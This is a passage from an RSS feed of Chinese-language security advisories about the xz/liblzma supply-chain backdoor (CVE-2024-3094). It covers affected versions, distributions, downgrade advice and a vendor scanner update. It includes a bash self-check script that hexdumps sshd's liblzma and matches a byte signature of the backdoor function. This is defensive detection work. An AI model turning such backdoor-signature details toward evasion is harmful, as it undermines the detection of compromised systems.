class="code-snippet__variable">$(ldd $(which sshd)</span> | grep liblzma | grep -o &#39;/[^ ]*&#39;)&#34;</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># does it even exist?</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> [ <span class="code-snippet__string">&#34;<span class="code-snippet__variable">$path</span>&#34;</span> == <span class="code-snippet__string">&#34;&#34;</span> ]</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably not vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">exit</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">fi</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># check for function signature</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> hexdump -ve <span class="code-snippet__string">&#39;1/1 &#34;%.2x&#34;&#39;</span> <span class="code-snippet__string">&#34;<span class="code-snippet__variable">$path</span>&#34;</span> | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">else</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably not vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">fi</span></span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">03</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">修复建议<br/></p></section></section></section></section><p><span style="font-size: 14px;">若确认受影响，请将xz降级至 5.4.6 版本。</span><br/></p><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">04</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">产品支持<br/></p></section></section></section></section><section style="margin-top: 16px;"><span style="font-size: 14px;">目前天融信脆弱性扫描与管理系统已紧急更新XZ-Utils 5.6.0/5.6.1版本后门事件预警（CVE-2024-3094）漏洞检查插件，帮助客户进行漏洞排查。<br/></span></section><p style=""><span style="font-size: 14px;">天融信脆弱性扫描与管理系统针对此漏洞的规则库更新如下图：</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012976" data-ratio="0.051933701657458566" data-s="300,640" style="" data-type="png" data-w="905" src="https://wechat2rss.xlab.app/img-proxy/?k=1fb47f48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGic6y7AofZY1ibhBYPbGBEiaicHh8wxpv7hpRmv7zERyuV7ztCyDwQaWa2g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size: 14px;">天融信脆弱性扫描与管理系统针对该漏洞检查结果如下图所示 ：<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012974" data-ratio="0.5566343042071198" data-s="300,640" style="" data-type="png" data-w="927" src="https://wechat2rss.xlab.app/img-proxy/?k=7d2456d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGUhILvGEHIGZw5xvftyFBLTrM8AHS6e8Hib6OmiaeYwljnBHgc5tUKjPA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size: 16px;"><strong>按照如下步骤对插件库进行升级和漏洞扫描：<br/></strong></span></p><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">1、在线自动升级，在“超级管理员”账号【系统管理】→【插件库升级】→【立即更新】→立即升级。</span></p><section style="margin-top: 16px;"><span style="font-size: 14px;">2、创建漏洞扫描任务，扫描完成后查看报告，如存在该漏洞，可按照报告中的修复建议进行“补缺”。</span></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496627">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5e3db2ad&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496627%26idx%3D1%26sn%3D0f65a56d67de2ead7f9ee32ff1441632%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 03 Apr 2024 18:53:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于liblzma/xz库5.6.0、5.6.1版本后门事件（CVE-2024-3094）的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496594&amp;idx=1&amp;sn=e09266aaa54a6ad0e8188a288084ef7f</link>
      <description>0x00 背景介绍3月29日，Openwall 邮件列表中公布了名为 XZ Utils 的流行软件包中的后门。</description>
      <content:encoded><![CDATA[<p>
<span>天融信应急响应</span> <span>2024-03-30 17:24</span> <span style="display: inline-block;">北京</span>
</p>

<p>0x00 背景介绍3月29日，Openwall 邮件列表中公布了名为 XZ Utils 的流行软件包中的后门。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c1e1a516&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFkMpic554JH9wMN9sGGnqtnY2uXf7fJnQz43vSaOcVS2lYia1VwPLIdgibmt4tXmH0rksNJ4WA0muPg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012943" data-ratio="0.4255555555555556" data-s="300,640" style="" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=b40f85a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFkMpic554JH9wMN9sGGnqtnsj5IpTcY6ibqiaLVoLPd5iaAhgW8MSjxP6kgEtgjNYcF0gp9Y3O3zxMAw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="text-indent: 0em;color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;">3月29日，Openwall 邮件列表中公布了名为 XZ Utils 的流行软件包中的后门。涉及混淆恶意代码的供应链攻击</span><span style="text-indent: 0em;color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;">。<mpchecktext><br/></mpchecktext></span><span style="font-size: 14pt;font-family: 宋体;color: black;"><span lang="EN-US"></span></span><span style="color: black;font-size: 14px;letter-spacing: 0.034em;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-wrap: wrap;"></span></span></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;"></span><span style="font-size: 14px;letter-spacing: 0.578px;">开发人员表示此次涉及一个名为 
liblzma 的库，SSHD 使用该库，SSHD 是用于远程访问的 Internet 
基础设施的关键部分。加载后，CVE-2024-3094会影响 SSHD 
的身份验证，恶意代码可能允许攻击者通过后门版本的SSH非授权获取系统的访问权限。恶意代码存在于XZ版本的5.6.0 、 5.6.1。<br/></span></p><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 漏洞编号</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;"><span style="font-size: 14px;"></span><span style="font-size: 14px;letter-spacing: 0.578px;">CVE-2024-3094</span></span><br/><span style="font-size: 14px;letter-spacing: 0.578px;"></span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><p style="margin-bottom: 0px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03漏洞等级</span></strong><br/></p><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p><span style="font-size: 14px;letter-spacing: 0.578px;">高危</span><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"></span></strong></p><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">xz 和 liblzma 5.6.0~5.6.1 版本，已知可能包括的发行版 / 包管理系统有：<br/>Fedora 41 / Fedora Rawhide<br/>Debian Sid<br/>Alpine Edge<br/>Arch Linux<br/>openSUSE Tumbleweed<br/>openSUSE MicroOS</span><span style="font-size: 14px;"></span><span style="font-size: 14px;"><mpchecktext><br/></mpchecktext></span><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"></span></p><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x05 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;">建议用户将版本降级到 5.4.x 版本。</span><br/><span style="font-size: 14px;">可利用如下脚本进行自查：<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="bash"><code><span class="code-snippet_outer"><span class="code-snippet__meta">#! /bin/bash</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">set</span> -eu</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># find path to liblzma used by sshd</span></span></code><code><span class="code-snippet_outer">path=<span class="code-snippet__string">&#34;<span class="code-snippet__variable">$(ldd $(which sshd)</span> | grep liblzma | grep -o &#39;/[^ ]*&#39;)&#34;</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># does it even exist?</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> [ <span class="code-snippet__string">&#34;<span class="code-snippet__variable">$path</span>&#34;</span> == <span class="code-snippet__string">&#34;&#34;</span> ]</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably not vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">exit</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">fi</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># check for function signature</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> hexdump -ve <span class="code-snippet__string">&#39;1/1 &#34;%.2x&#34;&#39;</span> <span class="code-snippet__string">&#34;<span class="code-snippet__variable">$path</span>&#34;</span> | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">else</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">echo</span> probably not vulnerable</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">fi</span></span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x06 参考链接</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p><span style="font-size: 14px;"><br/></span></p><p><span style="font-size: 14px;"><a href="https://www.lacework.com/blog/guidance-for-cve-2024-3094-finding-and-responding-to-the-latest-supply-chain-compromise-with-lacework/" target="_blank">https://www.lacework.com/blog/guidance-for-cve-2024-3094-finding-and-responding-to-the-latest-supply-chain-compromise-with-lacework/</a><br/><a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users" target="_blank">https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users</a><br/><a href="https://sysdig.com/blog/cve-2024-3094-detecting-the-sshd-backdoor-in-xz-utils/" target="_blank">https://sysdig.com/blog/cve-2024-3094-detecting-the-sshd-backdoor-in-xz-utils/</a><br/><a href="https://github.com/byinarie/CVE-2024-3094-info" target="_blank">https://github.com/byinarie/CVE-2024-3094-info</a><br/><a href="https://build.opensuse.org/request/show/1163302" target="_blank">https://build.opensuse.org/request/show/1163302</a></span></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x07 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</p><section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><section><section><section><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span></p></section></section></section></section></section></section></section><section style="margin-bottom: 0px;"><section><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" 